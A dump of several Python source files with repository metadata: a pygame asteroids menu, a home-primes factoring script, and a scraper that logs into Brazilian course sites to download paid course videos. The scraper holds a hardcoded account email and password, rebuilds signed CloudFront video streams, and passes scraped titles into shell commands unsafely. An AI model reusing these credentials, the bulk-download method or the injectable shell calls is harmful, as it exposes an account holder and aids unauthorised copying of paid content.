| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
757aed5f2d7b170e9c0c6e816158ab521912f796
| 9,969
|
py
|
Python
|
source/menus/menus.py
|
HugoPFe/Project-Asteroids
|
7a58ba00283216e83f02b2f58cf1944e9e217433
|
[
"MIT"
] | null | null | null |
source/menus/menus.py
|
HugoPFe/Project-Asteroids
|
7a58ba00283216e83f02b2f58cf1944e9e217433
|
[
"MIT"
] | 4
|
2021-06-20T21:32:53.000Z
|
2021-08-12T11:12:17.000Z
|
source/menus/menus.py
|
HugoPFe/Project-Asteroids
|
7a58ba00283216e83f02b2f58cf1944e9e217433
|
[
"MIT"
] | null | null | null |
import pygame
from pygame.locals import *
from util import *
from constants import FPS, VERSION, SCREEN_WIDTH, SCREEN_HEIGHT
from ui.button import *
from ui.font import *
from media.paths import bg, logo, body_font, title_font
class Main:
def __init__(self):
"""
It's the abstract class for all screens (with your own main loop)
"""
# Constants
self.BACKGROUND = pygame.image.load(bg)
# Variables
self.screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))
self.screen_rect = self.screen.get_rect()
self.clock = pygame.time.Clock()
self.running = True
self._buttons = []
def main_loop(self):
while self.running:
self._base_loop()
def _base_loop(self):
self.clock.tick(FPS)
for event in pygame.event.get():
if event.type == QUIT: # Making sure that all screens is stopped to run
for sub in Main.__subclasses__():
sub.running = False
if event.type == KEYDOWN:
if event.key == K_ESCAPE:
for sub in Main.__subclasses__():
sub.running = False
print(event)
self.check_events(event)
self.screen.blit(self.BACKGROUND, (0, 0))
self.loop()
pygame.display.flip()
def loop(self):
pass
def render_buttons(self):
""" Draw all buttons on screen """
for button in self._buttons:
button.render()
def add_buttons(self, *args):
for arg in args:
self._buttons.append(arg)
def check_events(self, event):
pass
@staticmethod
def change_screen(next_screen, previous_screen=None, kill_prev=False):
if kill_prev:
previous_screen.running = False
if previous_screen is not None:
next_screen(previous_screen)
else:
next_screen()
def back_screen(self):
self.running = False
@property
def running(self):
return self._running
@running.setter
def running(self, arg):
self._running = arg
print(f'[{self.__class__.__name__}]', f'running: {arg}')
def back_mainmenu(self, screen):
""" Returns directly to MainMenu """
self.back_screen()
screen.back_screen()
class MainMenu(Main):
def __init__(self, game_cls):
""" Class for Main menu """
Main.__init__(self)
self.logo = pygame.image.load(logo).convert_alpha()
self.logo_rect = self.logo.get_rect(center=(SCREEN_WIDTH / 2, 150))
# Buttons
self.play_button = Button(screen=self.screen,
x=120, y=SCREEN_HEIGHT - 220,
width=90, height=40,
text='Jogar',
padding=5,
command=lambda: self.change_screen(game_cls))
self.controls_button = Button(screen=self.screen,
x=120, y=SCREEN_HEIGHT - 160,
width=90, height=40,
text='Controles',
padding=5,
command=lambda: self.change_screen(ControlsMenu))
self.exit_button = Button(screen=self.screen,
x=120, y=SCREEN_HEIGHT - 100,
width=90, height=40,
text='Sair',
padding=5,
command=self.exit)
self.add_buttons(
self.play_button,
self.controls_button,
self.exit_button
)
# Version
self.version_txt = Font(f'version: {VERSION}', (SCREEN_WIDTH - 10, SCREEN_HEIGHT - 30), 'right')
self.version_txt.configure(font_name=body_font, size=15, color='white',
bg_color='black', screen=self.screen)
self.main_loop()
def loop(self):
self.screen.blit(self.logo, self.logo_rect)
self.render_buttons()
self.version_txt.render()
def exit(self):
self.running = False
class ControlsMenu(Main):
def __init__(self):
""" Class for Controls menu """
Main.__init__(self)
self.screen_x = self.screen.get_width()
self.screen_y = self.screen.get_height()
self.screen_rect = self.screen.get_rect()
self.keys_fonts_text = {
'up_font': {'command_text': 'Mover para cima', 'command_key': 'Seta para cima'},
'down_font': {'command_text': 'Mover para baixo', 'command_key': 'Seta para baixo'},
'left_font': {'command_text': 'Mover para esquerda', 'command_key': 'Seta para esquerda'},
'right_font': {'command_text': 'Mover para direita', 'command_key': 'Seta para direita'},
'clockwise_font': {'command_text': 'Girar em sentido horário', 'command_key': 'E'},
'anticlockwise_font': {'command_text': 'Girar em sentido anti-horário', 'command_key': 'Q'},
'shoot_font': {'command_text': 'Atirar', 'command_key': 'Espaço'},
'pause_font': {'command_text': 'Pausar', 'command_key': 'P'}
}
self.control_font = None
self.keys_fontgroup = None
self.keys_frame()
self.back_button = Button(screen=self.screen,
x=SCREEN_WIDTH / 2,
y=SCREEN_HEIGHT - 100,
width=80,height=40,
text='Voltar', padding=3,
command=lambda: self.back_screen())
self.add_buttons(self.back_button)
self.main_loop()
def loop(self):
self.screen.blit(self.frame, self.frame_rect)
self.render_buttons()
self.control_txt.render()
self.keys_fontgroup.render_fonts()
def keys_frame(self):
frame_color = '#353535'
self.frame = pygame.Surface((int(self.screen_x * 0.9), int(self.screen_y * 0.5)))
self.frame.fill(frame_color)
self.frame_rect = self.frame.get_rect(center=self.screen_rect.center)
self.frame_content(frame_color)
def frame_content(self, frame_color):
# Title command_list
self.control_txt = Font('Controles', pos=(self.frame_rect.centerx, 90))
self.control_txt.configure(screen=self.screen,
font_name=title_font,
size=50,
bold=True,
antialias=True,
color=(255, 255, 255),
bg_color=(0, 0, 0),
align='center')
# Keys fonts
font_space = 30
self.keys_fontgroup = FontsGroup(screen=self.screen,
font_name=body_font,
size=18,
bold=True,
antialias=True,
color=(255, 255, 255),
bg_color=frame_color)
keys_fonts_objects = []
for commands, value in self.keys_fonts_text.items(): # Adding fonts to list
keys_fonts_objects.append([Font(text=value['command_text'],
pos=(self.frame_rect.x + 30, self.frame_rect.y)),
Font(text=value['command_key'],
pos=(self.frame_rect.right - 30, self.frame_rect.y),
align='right')
])
c = 1
for command_font_list in keys_fonts_objects: # Rendering on screen
command_font_list[0].y += c * font_space
command_font_list[1].y += c * font_space
for i in range(2):
self.keys_fontgroup.add_fonts(command_font_list[i])
c += 1
class PauseScreen(Main):
def __init__(self, game):
""" Class for Pause screen """
Main.__init__(self)
self.paused_font = Font('Pausado', (self.screen_rect.centerx, 100), 'center')
self.paused_font.configure(screen=self.screen, font_name=title_font, size=50, bold=True,
antialias=True, color='white', bg_color='black')
# Buttons
self.continue_button = Button(screen=self.screen, x=self.screen_rect.centerx, y=400,
width=110, height=40, text='Continuar',
padding=10, command=self.back_screen)
self.controls_button = Button(screen=self.screen, x=self.screen_rect.centerx, y=460,
width=110, height=40, text='Controles',
padding=8, command=lambda: self.change_screen(ControlsMenu))
self.mainmenu_button = Button(screen=self.screen, x=self.screen_rect.centerx, y=520,
width=110, height=40, text='Menu',
padding=7, command=lambda: self.back_mainmenu(game))
self.add_buttons(
self.continue_button,
self.controls_button,
self.mainmenu_button
)
self.main_loop()
def loop(self):
self.paused_font.render()
self.render_buttons()
pygame.display.flip()
def check_events(self, event):
if event.type == KEYDOWN:
if event.key == K_p:
self.back_screen()
__all__ = ['Main', 'MainMenu', 'PauseScreen', 'ControlsMenu']
| 34.856643
| 104
| 0.51921
| 1,069
| 9,969
| 4.61927
| 0.199252
| 0.062778
| 0.035642
| 0.031187
| 0.346497
| 0.217699
| 0.200081
| 0.172742
| 0.133252
| 0.116646
| 0
| 0.021757
| 0.37757
| 9,969
| 285
| 105
| 34.978947
| 0.774053
| 0.035711
| 0
| 0.242574
| 0
| 0
| 0.073822
| 0.002827
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108911
| false
| 0.009901
| 0.034653
| 0.00495
| 0.168317
| 0.009901
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
757b44c079d1af1e49497f1e9f96873e80ae2cd3
| 15,155
|
py
|
Python
|
Cursos/treina_web.py
|
FranciscoAlveJr/Bot_Telegram
|
9960485a4a25648719ef6fafcb3b02c82db79253
|
[
"MIT"
] | null | null | null |
Cursos/treina_web.py
|
FranciscoAlveJr/Bot_Telegram
|
9960485a4a25648719ef6fafcb3b02c82db79253
|
[
"MIT"
] | null | null | null |
Cursos/treina_web.py
|
FranciscoAlveJr/Bot_Telegram
|
9960485a4a25648719ef6fafcb3b02c82db79253
|
[
"MIT"
] | null | null | null |
import requests
import json
import os
from bs4 import BeautifulSoup as bs
import random
import time
import base64
import m3u8
treinaweb_sessions = requests.Session()
class Downloader():
def index(self):
escolha = input('Qual plataforma voce deseja baixar?\n1 - TreinaWeb\n2 - AvMakers\n3 - Freelae\nResposta: ')
n = [1, 2, 3]
if escolha.isdigit():
escolha = int(escolha)
if escolha in n:
if escolha == 1:
self.main = 'treinaweb'
elif escolha == 2:
self.main = 'avmakers'
elif escolha == 3:
self.main = 'freelae'
else:
print('Erro. Saindo.')
exit(0)
self.headers = {
'authority': f'www.{self.main}.com.br',
'pragma': 'no-cache',
'cache-control': 'no-cache',
'upgrade-insecure-requests': '1',
'origin': f'https://www.{self.main}.com.br',
'content-type': 'application/x-www-form-urlencoded',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'navigate',
'sec-fetch-user': '?1',
'sec-fetch-dest': 'document',
'referer': f'https://www.{self.main}.com.br/login',
'accept-language': 'pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7',
}
cookie_jar = treinaweb_sessions.get(f'https://www.{self.main}.com.br/login', headers=self.headers).cookies.get_dict()[f'{self.main}-site']
#self.headers['cookie'] = f"treinaweb-site={cookie_jar}; path=/; secure; httponly; samesite=lax"
#self.cookies = {"treinaweb-site": cookie_jar}
user = 'ocoisa081@gmail.com'
pswd = '18020301.pP'
data = {
'username': user,
'password': pswd
}
treinaweb_sessions.post(f'https://www.{self.main}.com.br/login', headers=self.headers, data=data)
infos = treinaweb_sessions.get(f'https://www.{self.main}.com.br/api/painel/v1/aluno', headers=self.headers)
self.headers['cookie'] = f"{self.main}-site={infos.cookies.get_dict()[f'{self.main}-site']}; path=/; secure; httponly; samesite=lax"
#print(teste.headers)
#
self.quest()
def quest(self):
escolha = input(f'Escolha uma das funções abaixo\n1 - Baixar Cursos\n2 - Baixar Formações\n3 - Informações\n4 - Sair\nResposta: ')
n = [1, 2, 3]
if escolha.isdigit():
escolha = int(escolha)
if escolha in n:
if escolha == 1:
self.get_cursos()
elif escolha == 2:
self.get_formacao()
elif escolha == 3:
self.infos()
else:
print('Erro. Saindo.')
exit(0)
def get_cursos(self):
#downloaded_read = json.loads(open('downloaded.json', 'r', encoding='utf-8').read())
#downloaded_write = open('downloaded.json', 'w', encoding='utf-8')
infos = treinaweb_sessions.get(f'https://www.{self.main}.com.br/api/painel/v1/cursos', headers=self.headers).json()
categorias = {}
try:
cats = infos['meta']['categorias']['data']
for cat in cats:
categorias[cat['id']] = cat['nome']
except:
categorias = {
1: 'Freelae',
2: 'Bonus',
3: 'Bonus',
4: 'Bonus',
}
cursos = infos['data']
for index, curso in enumerate(cursos, start=1):
categoria = curso['categorias']
if len(categoria) > 1:
random_num = random.choice(categoria)
self.categoria = categorias[random_num]
else:
self.categoria = categorias[categoria[0]]
self.curso_nome = self.replacer(curso['nome'])
print(f'{index} - {self.curso_nome}')
print(f'{index+1} - Baixar todos')
escolha = input('Qual curso vc quer baixar?\nR: ')
if escolha.isdigit():
escolha = int(escolha)
if escolha < index + 1 :
curso = cursos[escolha-1]
self.get_course_here(curso)
elif escolha == index + 1 :
for index, curso in enumerate(cursos, start=1):
categoria = curso['categorias']
if len(categoria) > 1:
random_num = random.choice(categoria)
self.categoria = categorias[random_num]
else:
self.categoria = categorias[categoria[0]]
self.curso_nome = self.replacer(curso['nome'])
self.get_course_here(curso)
else:
print('Erro. Saindo.')
exit(0)
#downloaded_read.append(self.curso_nome)
#if self.curso_nome in downloaded_read:
#continue
#tipos
#1: Cursos
#2: Direto ao ponto
def get_course_here(self, curso):
if curso['tipo'] == 1:
self.tipo = 'Cursos'
a = self.return_self(curso['links'])
au = a['data']
aul =au['aulas']
aulas = aul['data']
elif curso['tipo'] == 2:
self.tipo = 'Direto ao Ponto'
a = self.return_self(curso['links'])
au = a['data']
aul =au['aulas']
aulas = aul['data']
elif curso['tipo'] == 3:
self.tipo = 'Projeto Prático'
a = self.return_self(curso['links'])
au = a['data']
aul =au['aulas']
aulas = aul['data']
else:
print(curso)
for aula in aulas:
modulo = self.replacer(aula['titulo'])
modulo_count = aula['ordem']
self.final_modulo = f'{modulo_count} - {modulo}'
sub_aulas = aula['subaulas']['data']
for sub_aula in sub_aulas:
aula_t = self.replacer(sub_aula['titulo'])
aula_count = sub_aula['ordem']
self.final_aula = f'{aula_count} - {aula_t}'
tipo = sub_aula['tipo']
print(f'{self.categoria} | {self.curso_nome} | {self.final_modulo} | {self.final_aula} | ', end='')
path = self.create_path(f'{self.main.capitalize()}/{self.tipo}/{self.categoria}/{self.curso_nome}/{self.final_modulo}')
if tipo == 3:
print("Questionario")
continue
elif tipo == 1:
print("Apostila")
self.aula_path = f'{path}/{self.final_aula}.html'
apostilas = self.get_apostilas(sub_aula['links'][0]['uri'])
css = 'body {margin: 50px 150px 50px 150px; text-align: justify} .HtmlContentRenderer_text-content-style__2TWCB {background-color: #fff font-size: 16px; font-weight: 400; color: #707070; word-break: break-word}'
html = f"<html lang='pt-br' data-product='treinaweb'><head><meta charset='utf-8'><style>{css}</style></head><body><h1>{self.final_aula}</h1><br><div class='HtmlContentRenderer_text'>{apostilas}</div></body></html>"
with open(self.aula_path, 'w', encoding='utf-8') as out:
out.write(html)
continue
elif tipo == 2:
self.aula_path = f'{path}/{self.final_aula}.mp4'
if os.path.exists(self.aula_path):
continue
print('Video')
videos = self.get_video(sub_aula['links'][0]['uri'])
if videos['url_anexo'] != None:
ext = videos['url_anexo'].split('?')[0].split('.')[-1]
os.system(f'aria2c -o "{path}/{self.final_aula}.{ext}" "{videos["url_anexo"]}" --quiet --continue=true')
pass
url = videos['url']
encoded = str(bs(treinaweb_sessions.get(url, headers=self.headers).content, 'html.parser').find('head').find('script', {'type': 'text/javascript'}))
encoded = encoded.split("';")[0]
encoded = encoded.split("= '")[1]
data = json.loads(base64.b64decode(encoded))
signatures = data["signatures"]
m3u8_signatures = signatures['m']
key_signatures = signatures['k']
ts_signatures = signatures['t']
#all_signatures = [m3u8_signatures, key_signatures, ts_signatures]
s3_user_hash = data["s3_user_hash"]
s3_video_hash = data["s3_video_hash"]
sessionID = data["sessionID"]
master_m3u8_name = 'index.m3u8'
self.get_m3u8(master_m3u8_name, m3u8_signatures, s3_user_hash, s3_video_hash, sessionID)
master_content = open(f"tmp/{master_m3u8_name}", 'r').read()
master_m3u8 = m3u8.loads(master_content)
self.set_master(master_m3u8)
master_content = open(f"tmp/{master_m3u8_name}", 'w')
master_dumps = master_m3u8.dumps()
with master_content as master_output:
master_output.write(master_dumps)
max_resolution = master_m3u8.playlists.__dict__['uri']
self.get_m3u8(max_resolution, m3u8_signatures, s3_user_hash, s3_video_hash, sessionID)
video_1080_content = open(f'tmp/{max_resolution}', 'r').read()
video_1080_m3u8 = m3u8.loads(video_1080_content)
video_1080_content = open(f'tmp/{max_resolution}', 'w')
video_dumps = video_1080_m3u8.dumps()
with video_1080_content as video_output:
video_output.write(video_dumps)
video_segments = video_1080_m3u8.data['segments']
key_type = max_resolution.replace('m3u8', 'key')
self.get_key(key_type, key_signatures, s3_user_hash, s3_video_hash, sessionID)
self.get_ts(video_segments, ts_signatures, s3_user_hash, s3_video_hash, sessionID)
if os.path.exists(self.aula_path) is False:
os.system(f'ffmpeg -allowed_extensions ALL -i "tmp/index.m3u8" "{self.aula_path}" -preset ultrafast -nostats -loglevel 0')
try:
os.system('del /q tmp')
except:
pass
try:
os.system('rmdir /q /s tmp')
except:
pass
continue
elif tipo == 4:
print(sub_aula)
exit(0)
#tipos
#1 = apostila
#2 = video
#3 = questionario
#4 = ??
time.sleep(1)
#with downloaded_write as output:
#output.write(json.dumps(downloaded_read))
def get_key(self, tipo, signatures, s3_user_hash, s3_video_hash, sessionID):
path = f'tmp'
cfp = signatures['CloudFront-Policy']
cfs = signatures['CloudFront-Signature']
kpid = signatures['CloudFront-Key-Pair-Id']
url = f'https://hls2.videos.sproutvideo.com/{s3_user_hash}/{s3_video_hash}/video/{tipo}?Policy={cfp}&Signature={cfs}&Key-Pair-Id={kpid}&sessionID={sessionID}'
os.system(f'aria2c -o "{path}/{tipo}" "{url}" --quiet --continue=true')
def set_master(self, master):
for x in master.playlists:
if '1080.m3u8' in x.__dict__['uri']:
master.playlists = x
break
elif '720.m3u8' in x.__dict__['uri']:
master.playlists = x
else:
master.playlists = x
def get_m3u8(self, tipo, signatures, s3_user_hash, s3_video_hash, sessionID):
path = 'tmp'
if os.path.exists(path) is False:
os.makedirs(path)
cfp = signatures['CloudFront-Policy']
cfs = signatures['CloudFront-Signature']
kpid = signatures['CloudFront-Key-Pair-Id']
m3u8_file = f'https://hls2.videos.sproutvideo.com/{s3_user_hash}/{s3_video_hash}/video/{tipo}?Policy={cfp}&Signature={cfs}&Key-Pair-Id={kpid}&sessionID={sessionID}'
os.system(f'aria2c -o "{path}/{tipo}" "{m3u8_file}" --quiet --continue=true')
def get_ts(self, segments, signatures, s3_user_hash, s3_video_hash, sessionID):
cfp = signatures['CloudFront-Policy']
cfs = signatures['CloudFront-Signature']
kpid = signatures['CloudFront-Key-Pair-Id']
path = 'tmp'
for segment in segments:
url = segment['uri']
segment_link = f'https://hls2.videos.sproutvideo.com/{s3_user_hash}/{s3_video_hash}/video/{url}?Policy={cfp}&Signature={cfs}&Key-Pair-Id={kpid}&sessionID={sessionID}'
filename = url
ts_path = f'{path}/{filename}'
if os.path.exists(ts_path) is False:
os.system(f'aria2c -o "{ts_path}" "{segment_link}" --quiet --continue=true')
time.sleep(0.01)
time.sleep(0.5)
def get_video(self, api):
video = treinaweb_sessions.get(api, headers=self.headers).json()['data']['video']['data']
return video
def get_apostilas(self, api):
apostilas = treinaweb_sessions.get(api, headers=self.headers).json()['data']['apostila']['data']['html']
return apostilas
def replacer(self, text):
invalid = {'/': '-','//': ' - ', r'"': r"'", '\\': " - ", '|': " - ", '<': "«", '>': "»", '*': "x", ':': ' -', '?': "¿", '\n': ' - '}
for char in invalid:
if char in text:
text = text.replace(char, invalid[char])
return text
def return_self(self, api):
for link in api:
if link['type'] == 'GET' and link['rel'] == 'self':
uri = link['uri'] + '?include=aulas'
aulas = treinaweb_sessions.get(uri, headers=self.headers).json()
return aulas
def create_path(self, path):
if os.path.exists(path) is False:
os.makedirs(path)
return path
#Downloader().index()
| 37.512376
| 234
| 0.512966
| 1,662
| 15,155
| 4.545728
| 0.199759
| 0.014825
| 0.015884
| 0.017472
| 0.400794
| 0.372733
| 0.353011
| 0.336069
| 0.265255
| 0.240635
| 0
| 0.028113
| 0.349852
| 15,155
| 404
| 235
| 37.512376
| 0.738354
| 0.041636
| 0
| 0.323636
| 0
| 0.050909
| 0.252551
| 0.059087
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047273
| false
| 0.014545
| 0.029091
| 0
| 0.098182
| 0.04
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
757c4a2be3e6e27c73b14c6ddc8062d7cb6e67ce
| 10,724
|
py
|
Python
|
A037274/simple.py
|
sethtroisi/OEIS
|
2c10b86d8a8be69aa8020623d4802e3d68772ede
|
[
"Apache-2.0"
] | 3
|
2019-05-25T23:08:48.000Z
|
2021-12-11T03:59:42.000Z
|
A037274/simple.py
|
sethtroisi/OEIS
|
2c10b86d8a8be69aa8020623d4802e3d68772ede
|
[
"Apache-2.0"
] | 1
|
2019-03-07T21:22:52.000Z
|
2019-03-07T21:22:52.000Z
|
A037274/simple.py
|
sethtroisi/OEIS
|
2c10b86d8a8be69aa8020623d4802e3d68772ede
|
[
"Apache-2.0"
] | 1
|
2021-04-29T06:35:07.000Z
|
2021-04-29T06:35:07.000Z
|
import gmpy2
import itertools
import subprocess
import math
import time
from collections import defaultdict
from factordb.factordb import FactorDB
START = 2
STOP = 5000
# Also see A056938
def product(factors):
temp = 1
for factor in factors:
temp *= factor
return temp
def factordb_format(number):
if number < 1e10:
return str(number)
strN = str(number)
length = len(strN)
if number < 1e24:
return "{}<{}>".format(strN, length)
return "{}...{}<{}>".format(strN[:10], strN[-2:], length)
def split_to_lines(number, max_size):
size = max_size - 2
# split this number evenly over multiple lines
needed_lines = (len(number) - 1) // size + 1
assert size * needed_lines >= len(number)
# split evenly onto this many lines
per_line = len(number) // needed_lines
# this many lines get 1 extra
extra = len(number) % needed_lines
assert per_line + (extra > 0) <= size
lines = []
for l in range(1, needed_lines+1):
# take per_line, plus potentially one extra
this_line = number[:per_line + (extra > 0)]
number = number[len(this_line):]
this_line += " /" if l != needed_lines else ""
lines.append(this_line)
return lines
def row_format(string, max_size=60):
if len(string) <= max_size:
return string
mult = " * "
if mult in string:
parts = string.split(mult)
lines = []
line = ""
for part in parts:
merged = line + part + mult
if len(merged) <= max_size + 1: # trailing space
line = merged
continue
elif line:
lines.append(line.strip())
line = ""
assert line == ""
if len(part) <= max_size - 2:
lines.append(part + " *")
continue
lines += split_to_lines(part + " *", max_size)
temp = "<br>".join(lines)
assert temp.endswith(" *"), temp[-20:]
return temp[:-2]
return "<br>".join(split_to_lines(string, max_size))
def factor_large(n, b1=10**6):
args = ["ecm", "-q", "-c", "10", str(b1)]
print ("\t\t", " ".join(args))
result = subprocess.run(
args,
input=str(n).encode(),
stdout=subprocess.PIPE)
if result.returncode == 8:
# Need to rerun with smaller b1
print("\t\tfound self ({} with b1={})".format(n, b1))
return factor_large(n, b1= max(100, b1 // 90))
return list(map(int, result.stdout.strip().split()))
def attempt_factorization(s, known_factors):
t = s
factors = []
for factor in known_factors:
# Last factor maybe non-prime
if gmpy2.is_prime(factor):
t //= factor
factors.append(factor)
# Toggle to if True: to recheck factordb.
if t >= 1e10 and t not in known_factors:
# Check factorDB (probably already been done)
time.sleep(0.2)
factordb = FactorDB(t)
factordb.connect()
factordb_factors = factordb.get_factor_list()
if factordb_factors:
print ("\t\tfactordb:", factordb.get_status(), factordb_factors)
for factor in factordb_factors:
if gmpy2.is_prime(factor):
t //= factor
factors.append(factor)
# small trial division
p = 2
while t > 1 and t < 1e10:
while t % p == 0:
t //= p
factors.append(p)
if t == 1:
break
p += 1 + (p&1)
return t, factors
def load_from_file():
home_primes = defaultdict(list)
n = None
s = None
with open("home_primes.txt") as f:
# each line is "<base> <start> <step> <status>: <factor> <factor> ..."
for line in f.readlines():
pre, post = line.strip().split(":")
*pre, status = pre.split()
base, start, step, = map(int, pre)
if start != n:
n = start
s = n
factors = list(map(int, post.split()))
assert status in ("FF", "P", "CF"), line
home_primes[(base, start, step)] = factors
assert product(factors) == s, (start, step, s, factors)
s = int("".join(map(str, factors)))
min_step = {}
duplicates = {}
all_primes = set()
composites = defaultdict(set)
for key, factors in home_primes.items():
for p in factors:
if gmpy2.is_prime(p):
all_primes.add(p)
else:
composites[key].add(p)
is_terminal = len(factors) == 1 and factors[0] in all_primes
s = int("".join(map(str, factors)))
if s in min_step and not is_terminal:
# Make sure min step isn't previous step or that's stupid
if min_step[s] == (key[0], key[1], key[2]-1):
continue
duplicates[key] = min_step[s]
else:
min_step[s] = key
print ("Found {} primes, {} composites".format(
len(all_primes), len(composites)))
return home_primes, min_step, duplicates, composites
def process(home_primes, composites):
added = False
try:
for n in range(START, STOP+1):
print (n)
t = n
for step in itertools.count(1):
if gmpy2.is_prime(t):
break
s = t
key = (10, n, step)
original = home_primes[key]
t, factors = attempt_factorization(s, original)
factors.sort()
if t > 1:
# t is composite
factors.append(t)
composites[key].add(t)
assert product(factors) == s, (s, t, factors)
if factors != original:
home_primes[key] = factors
added = True
print ("\t\tnew factor", factors)
if t > 1:
print ("Breaking, failed to factor C{}: {}".format(len(str(t)), factordb_format(t)))
break
new = int("".join(map(str, factors)))
t = new
if False:
if gmpy2.is_prime(s):
if new < 1e40:
print ("\t", step, new, "from", s, factors)
else:
print ("\t", step, new)
print ("\t\tfrom", factors)
if gmpy2.is_prime(t):
home_primes[(10, n, step)] = [t]
else:
print ("\t {} Gave up on step {}".format(n, step))
except KeyboardInterrupt:
print("Stopping from ^C")
return added
# For use with kernprof -v --line-by-line simple.py
#@profile
def run():
home_primes, min_step, duplicates, composites = load_from_file()
added = False
added = process(home_primes, composites)
if added:
with open("home_primes.txt", "w") as f:
for base, start, step in sorted(home_primes.keys()):
factors = home_primes[(base, start, step)]
if not factors:
continue
if all(gmpy2.is_prime(f) for f in factors):
if len(factors) == 1:
status = "P"
else:
status = "FF"
else:
status = "CF"
f.write("{} {} {} {}: {}\n".format(
base, start, step, status, " ".join(map(str, factors))))
# Sections copied into README.md
if True:
ranges = [(2,100), (2,499)] + [(a*500, a*500 + 499) for a in range(1, STOP//500)]
for low, high in ranges:
filename = "RESULTS_{}_{}.md".format(low, high)
print ("Genarating", filename)
template = """
## [Back](../README.md)
## Results for A037274 a(n) n={}..{}
---
|start|step|number|factors|
|-----|----|------|-------|
{}
"""
rows = []
for (_,start,step),factors in sorted(home_primes.items()):
if start not in range(low, high+1):
continue
num = row_format(str(product(factors)), max_size=40)
if len(factors) == 1:
factors = "Home Prime!" if gmpy2.is_prime(min(factors)) else "Unfactored composite"
else:
mult = " * ".join(map(str, sorted(factors)))
factors = row_format(mult, max_size=50)
columns = [start, step, num, factors]
rows.append("|" + "|".join(map(str, columns)) + "|")
with open("results/" + filename, "w") as f:
f.write(template.format(
low, high,
"\n".join(rows)))
if True:
count = 0
print ()
print ()
print ("### Unterminated")
print ("---")
print ()
# Move the "These <X> a(n) that have not..." line here
print ()
print ("|start|step|composite|same as|")
print ("|-----|----|---------|-------|")
same = defaultdict(list)
for key, cfs in composites.items():
same[tuple(sorted(cfs))].append("HP({}).{}".format(key[1], key[2]))
merged_count = 0
for (base, start, step), cfs in composites.items():
assert (base, start, step+1) not in home_primes
assert len(cfs) and not gmpy2.is_prime(max(cfs))
formatted_factors = tuple(factordb_format(c) for c in sorted(cfs))
key = tuple(sorted(cfs))
if (base, start, step) not in duplicates:
same_c = same[key]
assert same_c[0].startswith("HP({})".format(start)), (key, same_c)
print ("|HP({})|{}|{}|{}|".format(
start, step, ", ".join(formatted_factors), " ".join(same_c[1:])))
merged_count += len(same_c) - 1
count += 1
print ("{} numbers ({} merged) <= {} have not yet reached a prime".format(
count, count - merged_count, STOP))
print ()
print ()
if True:
print ("### Work")
print ("---")
print ()
# TODO use datetime here
print ("This is a short list of the smallest (and largest) unfactored numbers as of 2020-03.")
print ()
print ("|size|start|step|composite|other factor|")
print ("|----|-----|----|---------|------------|")
by_size = sorted((c, key) for key, cfs in composites.items() for c in cfs)
for c, key in by_size[:30] + by_size[-20:]:
if key in duplicates:
continue
others = home_primes[key][:]
others.remove(c)
print ("|c{}|HP({})|step {}|{}|{}|".format(
len(str(c)), key[1], key[2],
c,
" * ".join(map(str, others))))
print()
print()
if True:
deltas = []
last = ""
for (base,start,step),factors in sorted(home_primes.items()):
assert factors == sorted(factors)
new = "".join(map(str, factors))
if step > 1 and (base, start, step) not in duplicates:
delta = len(new) - len(last)
deltas.append((delta, int(last), int(new), start, step-1))
last = new
# For smallest jump | find biggest number
# For biggest jumps | find smallest number
deltas.sort(key=lambda d: (d[0], d[1] if d[0] > 3 else -d[1]))
print ()
print ("Home Primes with smallest and largest increase in number of digits")
print ()
print ("|+digits|HP|current|next|link|")
print ("|-------|--|-------|----|----|")
for delta, s1, s2, start, step in deltas[:15] + deltas[-15:]:
print("|{}|{}|{}|{}|{}|".format(
delta,
f"HP({start}).{step}",
factordb_format(abs(s1)),
factordb_format(abs(s2)),
"[FactorDB](http://factordb.com/aliquot.php?type=10&aq={}&big=1)".format(start)))
run()
| 26.743142
| 98
| 0.563129
| 1,425
| 10,724
| 4.159298
| 0.195088
| 0.031888
| 0.024127
| 0.016535
| 0.103256
| 0.066475
| 0.028682
| 0.028682
| 0.015522
| 0.015522
| 0
| 0.021538
| 0.272659
| 10,724
| 400
| 99
| 26.81
| 0.738333
| 0.067978
| 0
| 0.18
| 0
| 0.003333
| 0.108994
| 0.024266
| 0
| 0
| 0
| 0.0025
| 0.036667
| 1
| 0.03
| false
| 0
| 0.023333
| 0
| 0.096667
| 0.136667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
757f3810745dc98b37ec435828ecf0e2aaa534d5
| 1,212
|
py
|
Python
|
app/file2mysql.py
|
ToHanwei/CORD
|
09f75b136431222ec945b2ddd6798ae805ec332e
|
[
"MIT"
] | null | null | null |
app/file2mysql.py
|
ToHanwei/CORD
|
09f75b136431222ec945b2ddd6798ae805ec332e
|
[
"MIT"
] | null | null | null |
app/file2mysql.py
|
ToHanwei/CORD
|
09f75b136431222ec945b2ddd6798ae805ec332e
|
[
"MIT"
] | null | null | null |
#!coding:utf-8
import os
import sys
import pymysql
